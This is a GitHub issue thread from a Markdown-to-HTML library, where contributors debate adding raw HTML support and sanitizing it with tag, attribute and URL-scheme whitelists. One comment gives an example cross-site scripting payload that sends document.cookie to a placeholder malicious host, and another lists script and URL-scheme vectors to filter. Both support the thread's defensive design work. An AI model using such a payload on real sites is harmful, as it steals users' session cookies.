HTML support #16

tj · 2011-02-28T19:05:47Z

would be really nice, and bring it closer to the discount implementation

xavi- · 2011-04-20T13:53:34Z

+1

nddrylliog · 2011-05-11T19:39:43Z

+1 ! :)

sp · 2011-06-20T15:50:18Z

I think this is more than a "nice to have" - it's kind of a basic feature of markdown. See http://daringfireball.net/projects/markdown/syntax#html.

ashb · 2011-06-20T16:27:04Z

It's basic but my personally view is that its a really bad idea to mix markdown and HTML.

If someone writes the code to do this I'll happily accept it - I'm just not going write it myself.

nddrylliog · 2011-06-20T16:28:46Z

Well if markdown had something for styling (if only defining CSS classes..), I wouldn't need it. Does anyone have ideas?

ashb · 2011-06-20T16:34:39Z

We've got a (Maruku dialiect)[http://maruku.rubyforge.org/proposal.html] that supports their metadata proposal so you can do:

## Heading ## {: #my-id }

This is a para
{ .my-class }

to add id's and classes

xavi- · 2011-06-20T17:53:38Z

My main issue with the lack of HTML support is that it makes tables much harder. I know there are various implementations/proposals for a table syntax in markdown, but it does not seem like markdown-js supports any.

awirick · 2011-06-22T20:02:08Z

+1 - i'd use this for tables and other non-markdown supported tags (video).

jarrodbell · 2011-07-21T00:52:42Z

+1 required for any table support (including CSS for styling the tables globally via <STYLE> tags)
Anyone recommend another parser that supports this?

jarrodbell · 2011-07-21T10:01:06Z

Found @cadorn fork which includes HTML inline and works great!
https://github.com/cadorn/markdown-js

ashb · 2011-07-21T10:10:46Z

Can test that a bit more thoroughly and let me know if it works and then we'll get it merged in.

jarrodbell · 2011-07-21T10:14:59Z

I've used it for extensive table creation, and inline <STYLE> tags and it works perfect.

kragen · 2011-07-28T14:17:09Z

This is a duplicate of issue 11.

I don't think cadorn's fork should be merged in in its current state; although it looks like a good solution for applications like writing blog posts you host on your own server, it's only applicable in cases where you completely trust the source of the Markdown, and as such, it would open XSS security holes in applications that are currently using markdown-js to render input across trust boundaries. I'm pasting here the comment that I made on his commit:

So, while on one hand I really want this feature for my application of markdown-js, on the other hand I really want a way to filter the HTML to keep out things like the following:

unclosed <blockquote>
<script>
<a onmouseover>
<a href="jscript:...">
<a href="mocha:...">
<a href=" javascript:...">
<iframe>
<img width=1 height=1 src="http://...">
other things not mentioned here.

I think I'd also be a little happier with something other than false as the tag for as-is blocks. It is JSON-serializable, I suppose... I don't suppose there's a JSONML spec for this kind of thing, is there? Last I checked, the JSONML spec wasn't even clear as to whether the contents of JSONML elements were supposed to be CDATA or PCDATA.

I think another thing that we run into trouble with is entity handling. I ought to be able to write © 2011 Kragen Javier Sitaker in a Markdown document and have the © entity get passed through to the output (as you can see that it is in this comment). And the list from the spec, "<span>, <cite>, or <del>", is just a list of examples, not a complete list of span-level HTML tags; the intent is that any span-level HTML tag can be used in those contexts.

What this adds up to is that we probably need to run all the strings that are the contents of paragraphs, list items, or headers, through a more or less actual HTML parser that can be supplied with whitelists of tags, attributes, and URL schemes, so that it can successfully pass through the subset of well-formed HTML that's right for the application in question. In modern browsers, we could actually use DOMParser, but in Node we might have to use our own. It probably doesn't have to be quite as robust as a browser's parser, since many applications (and basically all applications that use some arbitrary subset of HTML) will give the user a chance to preview and fix their Markdown, so if it barfs on overlapping span-level tags (as GitHub sort of does: <b>overlapping <i>span-level</b> tags</i>) or unclosed tags, it's not a big deal.

I'm not proposing that you should do all this work for me; I was just checking out the network to see if someone had already done it. It looks like you're the one that's come closest. Would it be useful to you if I did what I'm describing? Would it remove the need for the code in this commit for you?

(Edited: fixed a typo.)

cadorn · 2011-07-28T18:19:46Z

@kragen - I am all for a more intelligent HTML parser the way you describe it. I am using this lib to render documentation for my internal projects so there was no need to check the HTML. Should be pretty easy to hook into what I have started.

kragen · 2011-07-29T13:13:00Z

(I've bolded some phrases below to facilitate skimming; hope it's not too annoying when you're reading straight through.)

Okay, well, I guess I'm committed to implementing this, then. Here's what I'm thinking about how to do it. Is this a good way to do it? I'd really appreciate comments before I go haring off without the benefit of other people's advice and experience.

JsonML doesn't have a spec written in English, as far as I can tell, just a BNF grammar and some example implementations in XSLT and JS with the DOM. As far as I can tell, both of the example implementations unescape entity references on input and re-escape them on output, although there's no English text to explain whether this is intentional or a bug.

I assert that this is a bug, because it robs JsonML of any way to represent SGML entity references. I propose that JsonML strings should be treated as PCDATA — allowed to contain entities but not tags — rather than CDATA (plain text) or HTML (text with entities and tags).

Accordingly, when we parse a code block or inline code chunk, we should escape & and < in it, and when we parse any other node, we should run it through an HTML parser to break it down into subnodes, ensuring that it's well-formed, modulo possible references to entities that we don't know about. (I don't propose to include a list of all defined HTML entities into markdown-js.) This means that in general we will not escape HTML on output. It also means that the effect of poorly-nested input tags will be limited to at most one parse-tree node.
The HTML parser used as an input filter should be configurable with whitelists of tags, attributes per tag, and URL schemes per attribute. By default it should be configured with a fairly strict filter, blocking even inline images and iframes with off-host URIs, and of course any possible vector for JS. This will annoy people like cadorn, for whom such filtering is unnecessary, and they need to have an easy way to turn off the whitelists (if not the HTML parsing entirely). But I think that is better than someone doing a git pull on markdown-js and getting privacy and XSS problems added to their application. That is, the default should be safe.

I'm hoping I can use an existing pure-JS HTML parser — say, jsdom's, or kn_htmlsafe_htmlSanitize, or NodeHtmlParser — rather than hacking one together from scratch. (As a fallback, I could write a very simple parser for the tags-and-attributes subset of XHTML.) I'm a little worried about the performance implications of this; markdown-js is already a little slower than Showdown, and this could make the matter worse. Does anybody have recommendations here?

(In the case where it's running in a modern browser, we could use DOMParser as an optimization, but enough people are using markdown-js in Node that I think it doesn't make sense to depend on that.)

(Elijah Insua's MIT-licensed pure-JS implementation of the W3C DOM)

(Ben Sittler's 3-clause BSD-licensed whitelisting, but not particularly configurable, pure-JS HTML sanitizer)

(A forgiving HTML/XML/RSS parser written in JS for both the browser and NodeJS)

Other variations:

Parse HTML on output, not input, instead of building JsonML nodes in the intermediate representation.

This has the disadvantage that it would make some kinds of processing on the intermediate representation harder — for example, in yamemex, I want to support Twitter-style #hashtags, and that will be easier to do if I can tell which hash
marks are in the text of the document and which are in some URL somewhere. Also, any markup added by intermediate-representation processing would be prone to being stripped by the output filter.

The advantage is that it would probably make the intermediate processing run faster and take less memory, and it expands the HTML parsers that can be used beyond just those that build a parse tree, which is slow; HTML parsers that simply produce sanitized HTML could be used. Also, the intermediate representation would be simpler, since it wouldn't have HTML tag names in it. This would involve changing the intermediate "JsonML" representation to have HTML rather than CDATA or PCDATA contents — so & would be represented as & in the intermediate representation, not as &, and <b> would mean <b>.
2. Leave the semantics of the intermediate representation unchanged aside from adding more tag names, parsing HTML on input and using an exhaustive list of HTML entities to convert things like © © and &ddagger; ‡ to Unicode characters. I think this would be a hassle to maintain. (Note that ‡ doesn't show up correctly here because GitHub has undertaken to maintain such a list for their Markdown implementation — and failed. Visit the URL data:text/html,&ddagger; to see that your browser supports it.)
3. Rather than parsing HTML on input or when rendering each node for output, pass through HTML tags from input to output (except inside code blocks, of course) and then run a final HTML-sanitizing pass on the output string to ensure that it's well-formed and safe. This has the advantage of very minimal coupling, and it would handle e.g. <img src="http://webbugs.example.com/"> the same way regardless of whether it was generated from ![ ](http://webbugs.example.com/) or just included literally in the source; the disadvantages are that it may be even slower than the other alternatives (making an additional pass over markup whose well-formedness and safety is guaranteed by construction), it could be a little more bug-prone ("Where did all of my <ol>s go? Oh, I left ol out of the whitelist."), and it doesn't facilitate intermediate processing in any way.

(My project using markdown-js for, ultimately, social bookmarking.)

So, what do other people think? The above represents a few hours of me thinking about the problem, but I anticipate that implementing it will take at least a few days of work, so I'd really appreciate help in thinking this through before I jump in.

kragen · 2011-07-29T14:07:02Z

I guess I should elaborate a little bit on the kinds of use cases/threat models I'm thinking of here:

Using Markdown to write your own blog on your own domain, which is cadorn's use case. There's little benefit to filtering your markup in this case; the worst case is that your blog is formatted funny because you forgot to close a <blockquote> or something. Unless you copy and paste a chunk of HTML from somewhere else, which brings us to:
Using Markdown to render stuff pulled (manually or automatically) from another origin. The risk here is that the author of the stuff may have included some code to take actions on your behalf and exfiltrate your private information (known as "cross-site scripting"), either in a straightforward way such as <script>im=new Image(); im.src="http://malicious.example.com/?"+document.cookie</script> or some more subtle way designed to evade naïve filters. Doing this reliably requires that you use a whitelist rather than a blacklist so you don't end up like the stupid losers who built MySpace.

(As defined in the same-origin policy.)

(Samy Kamkar explains the unbelievably incompetent security measures he hacked around to crash MySpace.)

Note that this category includes things like blogging software where someone might plausibly copy and paste a piece of someone else's web page in order to quote it.
Using Markdown to render stuff sent by a possible spammer or by someone else who has an illegitimate interest in knowing whether you have read it — such as email — in which case you do not want to confirm to the spammer that you have read it. In this case want to filter out anything whose rendering will generate network traffic (to anywhere other than the source of the rendered document, that is), such as <img src> and <iframe>, as well as all the items covered in Allow whitespaces in links between [Alt text] and [id] #2 above.

I believe yamemex is in category 2, because I excerpt the pages I bookmark with it all the time. markdown-js is currently safe for this case because it escapes all HTML, but I want it to let through safe HTML. I think that almost any server-based web application that renders Markdown taken from client requests is in category 2, if not category 3, and I think (though I don't know) that many markdown-js applications do that.

cadorn · 2011-07-29T20:04:58Z

I would pull in something like:

http://stackoverflow.com/questions/295566/sanitize-rewrite-html-on-the-client-side
- http://code.google.com/p/google-caja/source/browse/trunk/src/com/google/caja/plugin/html-sanitizer.js

Don't parse on output. I think it should make it into the JsonML structure and be sanitized by then.

Keep defaults safe and write minimal code using third party tested libraries where possible.

kragen · 2011-07-29T23:04:31Z

Oh hey! That looks nice! Thanks for finding that! I wonder how much of Caja I'd have to pull in to get it to work. Doesn't look like that much.

In general I'm not that enthusiastic about the quality of random third-party "tested" libraries in JS, but Caja is an exception; the project leads are programmers who use JavaScript, not "JavaScript programmers", and they are good ones.

So if the code can be made to do the job (which is still an "if"), that looks like a better option than the alternatives I suggested earlier. Maybe if I dig in I'll change my mind.

Apache 2.0 license should be okay, right, Ash?

ashb · 2011-07-30T15:50:36Z

Good work, your long comment

PCDATA vs CDATA: you make a good case for it being PCDATA.
At which point should the escaping of < or & be done? In the Markdown JsonML or when converting that to HTML JsonML? (Doing it at the first stage seems slightly off to me at first glance, but I've not thought through the implications of this.
the default should be safe

Absolutely.

Apache 2 is compatible with BSD right? For preference anyway I'd prefer if you just require another lib/module than pull the source in directly. If thats much of a pain to achieve then a subdir under lib/caja/ works too.

Above all else it seems you've got it well thought out. So long as there is some docs on how it behaves and it's not too tightly tied to only working in one way I'm more than happy to accept a pull request. Bonus points for having tests - I'm happy if these only run under node so long as the code itself is portable to browsers.

FireyFly · 2011-07-30T21:42:57Z

I'll pitch in on this one. I started using this library yesterday and wrote my own small modifications to markdown.js to handle the two problems presented in this issue (HTML tags and character entities). This was before checking the issues page finding this recently-discussed topic. :)

My use case is, for now, limited to my own usage (just like cadorn), but it'd be great with something more reliable than what I currently have. My main problem was actually block-level HTML, that I didn't want to be wrapped in a <p>, so my problem is slightly different.

As for the suggestion of pulling in Caja, I think it sounds like a great idea! Might be good to make it optional though, since, well, it is an additional dependency. Perhaps let it be an option which defaults to on, so that people who don't need the feature don't need to have Caja installed (or can remove it if it has to be bundled in lib/).

Anyway, great to see that this is being worked on/that I'm not the only one who want HTML support.

kragen · 2011-08-02T15:46:37Z

Hey, I just realized I never responded to the comments above. Didn't do anything this weekend, or yesterday.

Everything is compatible with BSD.

I'm trying to get the regression tests running and fix some smaller bugs first — see #26 if curious.

ap · 2012-05-18T00:54:42Z

@cadorn:

Don’t parse on output.

Why not…? That is what has always seemed most sensible to me – for the reason @kragen mentioned, that it treats all tags the same whatever their provenance. After all Markdown is by intent a shorthand for the most common of HTML. Whether you write *this* or <em>this</em> should really be immaterial, and both equally allowed or not.

cadorn · 2012-05-18T16:46:20Z

@ap This library is great because it has the JsonML intermediate layer. I send the JSON to the client and have the client convert if from JSON to HTML. I think HTML should be sanitized as it enters JsonML. The conversion from JsonML to HTML should be a simple dumb transformation so alternative output formats can be easily targeted.

What exactly are the specific problems with this approach (the comments above are too verbose to follow).

ashb · 2012-05-18T18:21:08Z

My favoured approach would be to have the HTML parsed and converted into JsonML for two reasons.

The first is as cadorn mentioned. The second is if you parse it into JsonML it should be easier to sanitize/limit the tags that are allowed.

@ap's comment sounds like violent agreement - i.e. you both want the HTML parsed?

ap · 2012-05-19T03:02:15Z

Hmm. Basically I consider a Markdown implementation incomplete unless all constructs that can be written using Markdown shorthand can also be written explicitly using the equivalent HTML – i.e. *this* and <em>this</em> should come out the same. (Likewise for <ol><li> and 1., explicit <p> and double newline, etc. etc.)

So if one is filtered, the other should be too, and if not, then neither should be.

Sanitising at the output stage (after the Markdown has become HTML) has the advantage that a) this equivalence just falls out of the implementation directly with zero further effort and b) the sanitiser is not coupled to the Markdown processor.

If you want to sanitise using an intermediate representation that differentiates between Markdown shorthand and explicit HTML then I guess you’d need to use a mapping table or function from Markdown to HTML so that the sanitiser can use it to treat Markdown shorthand syntax as if it were the implied HTML. That would work. The obvious disadvantage is that you are then effectively converting the Markdown to HTML twice, once for the sanitiser and once for output. However, if sanitising happens server-side and the output conversion on the client, then that may be worthwhile anyhow.

(It would save you the re-parsing using a completely decoupled HTML parser. And maybe the mapping during the sanitisation stage is cheap enough that it is negligible anyway.)

As for targeting alternative output formats, that is essentially a question of converting HTML to the output format in question. Again, by design and intent, Markdown is HTML, just an alternative form that supplies shorthand syntax for a chosen subset of tags. You can convert either all of HTML to the output format or only a defined subset, take your pick – but you convert HTML either way. (E.g. you could pick the subset that only covers the tags which have Markdown shorthands, and that’s fine. Note what this way of looking at it implies: that *this* and <em>this</em> come out the same. Once again.)

Does this help?

cadorn · 2012-05-19T03:15:05Z

What if we convert all known HTML tags (that correspond to markdown syntax) to markdown on input and leave the remaining HTML nodes as HTML (after sanitizing them). This would give a JsonML graph with markdown and HTML nodes allowing for Markdown syntax within HTML content.

We can then have a special tag with some options to optionally warp a chunk of HTML to customize how it is to be handled (markdown in content on pure HTML).

On the JsonML -> HTML side any HTML nodes just get dumped.

This may be the best solution but harder to implement using a third party library unless you get more into the guts of it.
We need super fast HTML chunk sanitation and a list of html tags to decide what to do.

ap · 2012-05-19T04:39:53Z

That would work, I think. One thing though, things like <em style="font-size: 2em"> cannot be mapped in the HTML→Markdown direction so there is a likelihood that they will be rejected entirely, whereas if you map Markdown→HTML for sanitisation then this tag would probably get its style attribute stripped but then still be allowed through as a bare <em>.

OTOH if you build a hard-coded Markdown-based list of allowed tags into the sanitiser you can get that effect even with a HTML→Markdown mapping. (Which then means you cannot avoid running the sanitiser by simply dropping all explicit HTML tags, because these hard-coded tags must still be allowed through even if nothing else is. But that’s neither here nor there since Markdown = HTML anyway, so either you don’t sanitise at all or you sanitise both forms…)

ashb · 2012-05-19T08:18:05Z

@ap attributes are possible, certainly at the JsonML level since the Maruku dialect support this via: *a*{: style="font-size: 2em" } - the JsonML for it would be [ "em", { "style="font-size: 2em" }, "a" ] (from memory so might be slightly off).

ap · 2012-05-19T08:38:09Z

I don’t mean whether it is possible to parse them, I mean how they are treated by the sanitiser. If the sanitiser is configured to disallow everything, it should still allow <em style="..."> to pass through as a stripped <em> (if Markdown’s asterisk syntax is permitted), just as output sanitisation after conversion to HTML would behave.

Then if the sanitiser implements equivalence of HTML and Markdown by first mapping HTML to Markdown where there is equivalent Markdown syntax, as @cadorn proposed, then edge cases like this which only half map to Markdown are likely not to work quite like they would with output sanitisation – unless care is taken to support them explicitly.

A good test suite is probably of the essence to ensure that the intent of the explicit support is preserved in the future, though! The separate output HTML filter stage has the advantage that this will all just work as desired by definition, implicitly – it’s robust in a way inline sanitisation is not, albeit, of course, at a performance penalty that we are trying to avoid here.

cadorn · 2012-05-24T16:28:11Z

This lib is for Markdown -> JsonML -> HTML conversion.
We want it to also do Markdown + HTML -> JsonML -> HTML with various options/configurations to allow inline makrdown in HTML and HTML chunks either sanitized or unsanitized.

I have no problem with not being able to go backwards from the resulting HTML to Markdown + HTML if the source HTML used non-standard tags. Warning can be thrown if this happens during the Markdown + HTML -> HTML conversion.

If someone wants bi-directional conversion certain rules must be followed which are too restrictive for many cases.

I want to write website content in Markdown + HTML and want the conversion with HTML and inline Markdown in HTML to JsonML without sanitation as I have control over the source. In this case I want all HTML attributes to come through.

I also want the public to edit markdown + HTML for comments etc... in which sanitation is a must.

I am not going to discuss the same point back and forth any more as I think @ashb and I are on the same page for the overall approach. We just need to work out the details and get coding.

ap · 2012-05-24T18:53:57Z

No problem.

I was referring to this bit from you:

What if we convert all known HTML tags (that correspond to markdown syntax) to markdown on input and leave the remaining HTML nodes as HTML (after sanitizing them).

This is workable, and will mostly fulfil the criterion I was talking about (that if * is allowed then <em> also should be). But consider what happens if the user types <em onclick="...">.

In the scenario where you sanitise by parsing the output, the sanitiser would certainly be configured to allow em elements (because otherwise it would filter out all emphasis) but certainly would not allow onclick attributes (hello XSS!). So what the user who typed <em onclick="..."> would get is a bare <em> tag.

Now if it works the way you suggested, then you will map <em>this</em> to the moral equivalent of *this* (at the JsonML level) in the pre-sanitiser stage. But you cannot do the same for <em onclick="...">. And then if the sanitiser is configured to allow nothing, it still needs hard-wired knowledge of what is expressible in Markdown, so that it will know to output a stripped <em> tag when it encounters that input, instead of stripping it out completely.

Does that help?

cadorn · 2012-05-28T16:23:32Z

<em onclick="..."> would be mapped to *this* + attribute map in JsonML from which you can get <em onclick="..."> back on output if sanitize is switched off or onlick attr is allowed.

I think we need to hard-wire the Markdown <-> HTML tag mappings anyway to make any of this work.

Looks like we just need a HTML -> JsonML parser and a sanitizer that works on JsonML. It should not be too difficult to modify a good/portable/purejs HTML parser to do that for us.

@ap So are we on the same page now?

ap · 2012-05-28T16:29:57Z

<em onclick="..."> would be mapped to *this* + attribute map in JsonML

Ahhh. Nice. That addresses the issue I was talking about then, excellent.

Yes, I believe we’re on the same page.

ashb · 2012-05-28T16:48:28Z

Looks like we just need a HTML -> JsonML parser and a sanitizer that works on JsonML

Agreed. But this also seems like a lot of work if you wan't to deal with less than well formed HMTL - I would be happy for badly formed HTML to just fall back to being parsed as markdown (i.e you'd see literal < in the output etc. etc.) Thoughts?

ap · 2012-05-28T17:00:15Z

Maybe it’s possible to tie in an existing HTML5 parser?

Otherwise just showing syntactically bad tags as literal text is fine with me.

(Maybe do that by default with the option of adding a parser so that people can pay the cost only if they want it.)

cadorn · 2012-05-28T20:19:37Z

@ashb Good suggestion. I think it will come down to the HTML parser.

@ap Yes. I think we should definitely try and re-use an existing parser and convert the AST to JsonML.

cadorn · 2012-05-31T16:05:01Z

This list may be a good resource to ask for a HTML to JsonML converter or suggestion about which HTML parser to use: https://groups.google.com/group/js-tools

Do we have a spec for JsonML?

xavi- · 2012-05-31T16:17:37Z

The grammar for JsonML is list on the website (http://www.jsonml.org/) if that's what you're looking for

ashb · 2012-05-31T16:20:08Z

And in terms of which node names we use, we kinda just made them up. See... https://github.com/evilstreak/markdown-js/blob/master/lib/markdown.js#L1470-1559

axefrog · 2012-07-21T18:05:08Z

Why are you guys overcomplicating this? Stick an option in there to allow inline html and leave it at that. Default it to false if you want to. Trying to make the decision for the developer that you need to protect them from scenarios (i.e. cross-site scripting) that are outside the scope of translating markdown to html just causes the library to become bloated, less maintainable and annoys all the people who are expecting it to behave as per the original markdown specification.

I suggest you read http://daringfireball.net/projects/markdown/syntax#html - nowhere does it specify that you should escape HTML tags.

If you're going to make it support less than the markdown specification at a minimum, or behave contrary to how markdown should behave, then you should call it something other than markdown and remove the hold on the "markdown" identifier in the npm registry, as there are a huge number of developers out there who see this library as the "preferred" library for markdown in node.js (or otherwise) and then start using it only to discover that you don't support the proper markdown specification.

ashb · 2012-07-21T22:59:07Z

Even a simple 'allow inline HTML' flag needs some level of HTML parsing to know when to switch back to parsing Markdown again:

Note that Markdown formatting syntax is not processed within block-level HTML tags. E.g., you can’t use Markdown-style emphasis inside an HTML block.

I'm personally against putting inline HTML in my markdown as it just feels wrong to me which is why I haven't written the code do to this yet. If someone submits a pull request that achieves even simple inline HMTL and has some tests I'm more than happy to merge it in.

ap · 2012-07-22T12:20:14Z

I’m personally against putting inline HTML in my Markdown as it just feels wrong to me

You have not attained Markdown nature yet, Ash. :-)

ashb · 2013-08-28T11:14:51Z

Just so you are all aware: replying with "+1" and nothing else makes me less likely to want to work on this.

It's going to happen at some point but you aren't helping. I'm going to delete those comments because they just add noise.

adam-stokes · 2013-11-24T16:28:49Z

@ashb any word on this bug? it's been a couple years so just curious if this will be implemented or if you've decided not to..

misterdai · 2014-01-17T14:38:03Z

It'd be nice to have an update on this issue. I ran into it myself but side-stepped it for now by escaping HTML on the way into the Markdown parser. So > would end up at &gt; and I'd replace them on the content that comes back out. Not the nicest route to take but didn't want to muck around with the module itself (for what I was working on).

Ignore my workaround, it didn't allow for code snippets :-(

kevinSuttle · 2014-02-11T22:45:53Z

Yeah I'm just noticing the entity substitution also. Not the biggest deal since a lot of browsers know what it means, and render it accordingly, but still, it'd be nice.

codingisacopingstrategy · 2014-04-03T11:54:41Z

For those asking for updates, there have been a number of pull requests, the most recent of which is #98

adam-stokes · 2014-04-03T12:54:16Z

I wouldn't hold your breath it doesn't look like the maintainer is planning on doing anything at all.

codingisacopingstrategy · 2014-04-03T14:23:00Z

From the threads I get the impression that this functionality is not really near to the heart of the maintainer, but (s)he hasn’t explicitly said he’ll refuse pull requests… The linked pull request is still open…

I asked for a comment on what is blocking the pull request so that we know if there is a way to help out?

cheers,

axefrog · 2014-04-03T15:13:42Z

Guys, there are better alternatives nowdays anyway:
Marked: https://github.com/chjj/marked
MarkdownDeep: http://www.toptensoftware.com/markdowndeep/ / https://www.npmjs.org/package/markdowndeep
Both support HTML and have plenty of great features

codingisacopingstrategy · 2014-04-09T10:51:34Z

That depends on what you are looking for; for a project we needed to extend Markdown with a new dialect, and this was much easier to do in markdown-js then in marked, for example. I’d still be really happy with an HTML supporting markdown.js

foolyoghurt · 2014-09-02T15:22:02Z

@axefrog Thanks for sharing. Marked is awesome!

luishdez · 2014-10-22T05:53:53Z

I agree with the other comments, this parser should not be aware of things like XSS that's the developer problem and should be handled by other parts of the application ( that's obvious )

Moving to marked too

mansu · 2015-02-18T08:09:13Z

+1 for not escaping html in markdown parser.

If this not going to be fixed, please say so at the top of the README. I just wasted 2 days playing with this library and need to rewrite my parser now.

ashb mentioned this issue Oct 9, 2013

FIX: HTML blocks should not be surrounded by <p> #139

Closed

This was referenced Dec 14, 2014

[Question] How do I prevent HTML / script injection? #225

Closed

Why escaping HTML? #219

Closed

This was referenced Dec 23, 2014

Better support for fenced code blocks #220

Closed

Don't convert ampersands when they form part of an HTML entity #227

Closed

ghost mentioned this issue May 6, 2016

YouTube video markdown #226

Open

HTML support #16

HTML support #16

Comments

tj commented Feb 28, 2011

xavi- commented Apr 20, 2011

nddrylliog commented May 11, 2011

sp commented Jun 20, 2011

ashb commented Jun 20, 2011

nddrylliog commented Jun 20, 2011

ashb commented Jun 20, 2011

xavi- commented Jun 20, 2011

awirick commented Jun 22, 2011

jarrodbell commented Jul 21, 2011

jarrodbell commented Jul 21, 2011

ashb commented Jul 21, 2011

jarrodbell commented Jul 21, 2011

kragen commented Jul 28, 2011

cadorn commented Jul 28, 2011

kragen commented Jul 29, 2011

kragen commented Jul 29, 2011

cadorn commented Jul 29, 2011

kragen commented Jul 29, 2011

ashb commented Jul 30, 2011

FireyFly commented Jul 30, 2011

kragen commented Aug 2, 2011

ap commented May 18, 2012

cadorn commented May 18, 2012

ashb commented May 18, 2012

ap commented May 19, 2012

cadorn commented May 19, 2012

ap commented May 19, 2012

ashb commented May 19, 2012

ap commented May 19, 2012

cadorn commented May 24, 2012

ap commented May 24, 2012

cadorn commented May 28, 2012

ap commented May 28, 2012

ashb commented May 28, 2012

ap commented May 28, 2012

cadorn commented May 28, 2012

cadorn commented May 31, 2012

xavi- commented May 31, 2012

ashb commented May 31, 2012

axefrog commented Jul 21, 2012

ashb commented Jul 21, 2012

ap commented Jul 22, 2012

ashb commented Aug 28, 2013

adam-stokes commented Nov 24, 2013

misterdai commented Jan 17, 2014

kevinSuttle commented Feb 11, 2014

codingisacopingstrategy commented Apr 3, 2014

adam-stokes commented Apr 3, 2014

codingisacopingstrategy commented Apr 3, 2014

axefrog commented Apr 3, 2014

codingisacopingstrategy commented Apr 9, 2014

foolyoghurt commented Sep 2, 2014

luishdez commented Oct 22, 2014

mansu commented Feb 18, 2015